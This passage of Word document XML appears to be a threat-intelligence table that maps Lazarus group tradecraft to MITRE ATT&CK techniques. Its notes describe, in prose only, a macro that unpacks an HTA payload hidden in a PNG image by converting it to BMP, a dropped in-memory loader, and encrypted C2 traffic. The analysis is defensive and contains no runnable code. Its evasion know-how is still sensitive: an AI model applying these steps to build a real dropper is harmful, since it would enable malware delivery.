          <w:p w14:paraId="0EFA45BD" w14:textId="522E51F2" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="003519AF" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32521BDC" w14:textId="56667FC4" w:rsidR="001D4C19" w:rsidRPr="00ED5880" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Known examples from Group description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444ED5" w:rsidRPr="00B54722" w14:paraId="04EDC9B1" w14:textId="77777777" w:rsidTr="002E403F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697C7B46" w14:textId="2F7C3882" w:rsidR="00444ED5" w:rsidRPr="00B54722" w:rsidRDefault="00444ED5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67920AC3" w14:textId="77777777" w:rsidR="00444ED5" w:rsidRPr="00B54722" w:rsidRDefault="00444ED5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54722">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">TA0011 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B3CEFA" w14:textId="77777777" w:rsidR="00444ED5" w:rsidRPr="00B54722" w:rsidRDefault="00444ED5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1573 Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55183B7D" w14:textId="7C1DB968" w:rsidR="00444ED5" w:rsidRPr="00B54722" w:rsidRDefault="00444ED5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="003F367A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DAF0F1E" w14:textId="77777777" w:rsidR="00444ED5" w:rsidRPr="00B54722" w:rsidRDefault="00444ED5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FE3AA2B" w14:textId="77777777" w:rsidR="00444ED5" w:rsidRPr="00B54722" w:rsidRDefault="00444ED5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C041D45" w14:textId="6B46B064" w:rsidR="00444ED5" w:rsidRPr="00B54722" w:rsidRDefault="003519AF" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04E3BE41" w14:textId="77777777" w:rsidR="00444ED5" w:rsidRDefault="00444ED5" w:rsidP="002E403F">
            <w:r>
              <w:t>Message out</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30068374" w14:textId="1864F27A" w:rsidR="00444ED5" w:rsidRPr="00B54722" w:rsidRDefault="00444ED5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00BA6DC3">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB4C4F">
              <w:t>Makes HTTP requests to command and control servers: The server addresses have been base64 encoded and encrypted using a custom encryption algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="39"/>
      <w:tr w:rsidR="001D4C19" w:rsidRPr="00B857D7" w14:paraId="7ADDEC02" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D350174" w14:textId="5B1F88A7" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="00960473" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CF884FF" w14:textId="1FE7DDCF" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7512F676" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A420FEA" w14:textId="62499507" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="00960473" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F361F4B" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22684AC3" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7386062C" w14:textId="06771B8B" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77A7C92E" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60F3080F" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="0077286F" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2"/>
    <w:p w14:paraId="66892015" w14:textId="08C204FA" w:rsidR="00A16DF2" w:rsidRDefault="001C64FE" w:rsidP="00A16DF2">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[Analysis]Andariel_Group.pdf (ahnlab.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CF4D18">
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEE300" w14:textId="279D6F17" w:rsidR="001C64FE" w:rsidRDefault="001C64FE" w:rsidP="00A16DF2">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Lazarus APT conceals malicious code within BMP image to drop its RAT (malwarebytes.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CF4D18">
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3DC0AE" w14:textId="216085EB" w:rsidR="00ED7D76" w:rsidRPr="00C94979" w:rsidRDefault="00ED7D76" w:rsidP="00ED7D76">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>New campaign targeting security researchers (</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>blog.google</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00165A0B">
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7769988C" w14:textId="77777777" w:rsidR="002A12D2" w:rsidRDefault="002A12D2" w:rsidP="00A16DF2"/>
    <w:p w14:paraId="7A9302B3" w14:textId="608ADD90" w:rsidR="00FB1281" w:rsidRDefault="002A12D2" w:rsidP="00A16DF2">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00B076C3">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00FB1281">
        <w:t>Related to Lazarus group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DD4D0A" w14:textId="4B54FF98" w:rsidR="002A12D2" w:rsidRPr="00FB1281" w:rsidRDefault="002A12D2" w:rsidP="00A16DF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00B076C3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>] In one of their most recent campaigns Lazarus used a complex targeted phishing attack against </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="337AB7"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>security researchers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA68505" w14:textId="257E791A" w:rsidR="006C6932" w:rsidRPr="006C6932" w:rsidRDefault="006C6932" w:rsidP="00A16DF2"/>
    <w:p w14:paraId="6765B365" w14:textId="2EB0C676" w:rsidR="00A16DF2" w:rsidRDefault="00B54722" w:rsidP="00751E97">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00B076C3">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00547BCA" w:rsidRPr="00547BCA">
        <w:t>The document has been weaponized with a macro that is executed upon opening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AAA906" w14:textId="7B6F3130" w:rsidR="00547BCA" w:rsidRDefault="00547BCA" w:rsidP="00751E97">
      <w:r>
        <w:t>Which…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DC362" w14:textId="77777777" w:rsidR="00547BCA" w:rsidRDefault="00547BCA" w:rsidP="00547BCA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Defines the required variables such as WMI object, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and file extension in base64 format and then calls Decode function to base64 decode them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D53B4" w14:textId="77777777" w:rsidR="00547BCA" w:rsidRDefault="00547BCA" w:rsidP="00547BCA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Gets the active document name and separates the name from extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668EACD9" w14:textId="4874BEDF" w:rsidR="00547BCA" w:rsidRDefault="00547BCA" w:rsidP="00547BCA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creates a copy of the active document in HTML format using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ActiveDocument.SaveAs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wDFormatHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as parameter. Saving document as HTML will store all the images within this document in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FILENAME_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB59D6" w14:textId="74BBF5FA" w:rsidR="00757ACC" w:rsidRDefault="00757ACC" w:rsidP="00547BCA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00757ACC">
        <w:t>Calls show function to makes document protected. By making document protected it makes sure users can not make any changes to the document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8FBB77" w14:textId="77777777" w:rsidR="00100373" w:rsidRDefault="00100373" w:rsidP="00100373">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gets the image file that has an embedded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> object. (image003.png)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D87EEA" w14:textId="586C8BA8" w:rsidR="00100373" w:rsidRDefault="00100373" w:rsidP="00100373">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Converts the image in PNG format into BMP format by calling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WIA_ConvertImage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Since the BMP file format is uncompressed graphics file format, converting a PNG file format into BMP file format automatically decompresses the malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> object embedded from PNG to BMP. This is a clever method used by the actor to bypass security mechanisms that can detect embedded objects within images. The reason is because the document contains a PNG image that has a compressed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> malicious object and since it’s compressed it cannot be detected by static detections. Then the threat actor just used a simple conversion mechanism to decompress the malicious content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CA5AC" w14:textId="77777777" w:rsidR="00F267E6" w:rsidRDefault="00F267E6" w:rsidP="00F267E6">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gets a WMI object to call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to execute the bmp file. The BMP file after decompression contains a HTA file which executes Java Script to drop a payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD0A08D" w14:textId="593BE9F3" w:rsidR="00F267E6" w:rsidRDefault="00F267E6" w:rsidP="00F267E6">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deletes all the images in the directory and then removes the directory generated by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SaveAs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AF314" w14:textId="1E7BB75B" w:rsidR="00951E34" w:rsidRDefault="00951E34" w:rsidP="00F267E6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00951E34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1207.003 Obfuscated Files or Information: Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B35EC23" w14:textId="32411204" w:rsidR="0023637A" w:rsidRDefault="00B54722" w:rsidP="0023637A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="002B34F7">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="0023637A" w:rsidRPr="0023637A">
        <w:t>The macro added the extension zip to the BMP file during the image conversion process to pretend it’s a zip file. This BMP file has an embedded HTA file. This HTA contains a JavaScript that creates “AppStore.exe” in the “C:\Users\Public\Libraries\AppStore.exe” directory and then populates its content.</w:t>
      </w:r>
      <w:r w:rsidR="0023637A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0023637A">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0023637A" w:rsidRPr="0023637A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0023637A" w:rsidRPr="0023637A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1036 Masquerading</w:t>
      </w:r>
      <w:r w:rsidR="0023637A">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A1D9D8" w14:textId="25FFD943" w:rsidR="00F23A1F" w:rsidRDefault="00B54722" w:rsidP="0023637A">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00CF11A7">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00F23A1F" w:rsidRPr="00F23A1F">
        <w:t xml:space="preserve">At the end it calls </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F23A1F" w:rsidRPr="00F23A1F">
        <w:t>Wscript.Run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F23A1F" w:rsidRPr="00F23A1F">
        <w:t xml:space="preserve"> to execute the</w:t>
      </w:r>
      <w:r w:rsidR="00F23A1F">
        <w:t xml:space="preserve"> dropped payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183F40DE" w14:textId="75C388DE" w:rsidR="000B53FF" w:rsidRDefault="00B54722" w:rsidP="0023637A">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00CF11A7">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="000B53FF" w:rsidRPr="000B53FF">
        <w:t>This payload is loaded into memory by AppStore.exe and has not been written to disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B0E1C1" w14:textId="118D0814" w:rsidR="00CF11A7" w:rsidRDefault="00CF11A7" w:rsidP="00CF11A7">
      <w:r>
        <w:t>[2] Payload analysis (AppStore.exe) - AppStore.exe loads a base64 encrypted payload that has been added to the end of itself. Before the payload there is a string which is the decryption key (by7mJSoKVDaWg*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E02035" w14:textId="4D63A35B" w:rsidR="00AB4C4F" w:rsidRDefault="00B54722" w:rsidP="0023637A">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="008D4CE1">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00AB4C4F" w:rsidRPr="00AB4C4F">
        <w:t>Makes HTTP requests to command and control servers: The server addresses have been base64 encoded and encrypted using a custom encryption algorithm. You can find the decoder/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB4C4F" w:rsidRPr="00AB4C4F">
        <w:t>decryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB4C4F" w:rsidRPr="00AB4C4F">
        <w:t xml:space="preserve"> here. This custom encryption algorithm is similar to the encryption algorithm used by BISTROMATH RAT associated to Lazarus reported by US-CERT.</w:t>
      </w:r>
      <w:r w:rsidR="00661D48">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00661D48">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00661D48" w:rsidRPr="00661D48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1132.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00661D48" w:rsidRPr="00661D48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Encoding : Standard Encoding</w:t>
      </w:r>
      <w:r w:rsidR="00661D48">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC9CCDD" w14:textId="7E35D40F" w:rsidR="00B076C3" w:rsidRDefault="00B076C3" w:rsidP="0023637A">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00B076C3">
        <w:t xml:space="preserve">The actor has used a clever method to bypass security mechanisms in which it has embedded its malicious HTA file as a compressed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B076C3">
        <w:t>zlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B076C3">
        <w:t xml:space="preserve"> file within a PNG file that then has been decompressed during run time by converting itself to the BMP format. The dropped payload was a loader that decoded and decrypted the second stage payload into memory. The second stage payload has the capability to receive and execute commands/shellcode as well as perform exfiltration and communications to a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B076C3">
        <w:t>command and control</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B076C3">
        <w:t xml:space="preserve"> server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E339D5" w14:textId="2D2E8FCC" w:rsidR="00327101" w:rsidRDefault="00327101" w:rsidP="0023637A"/>
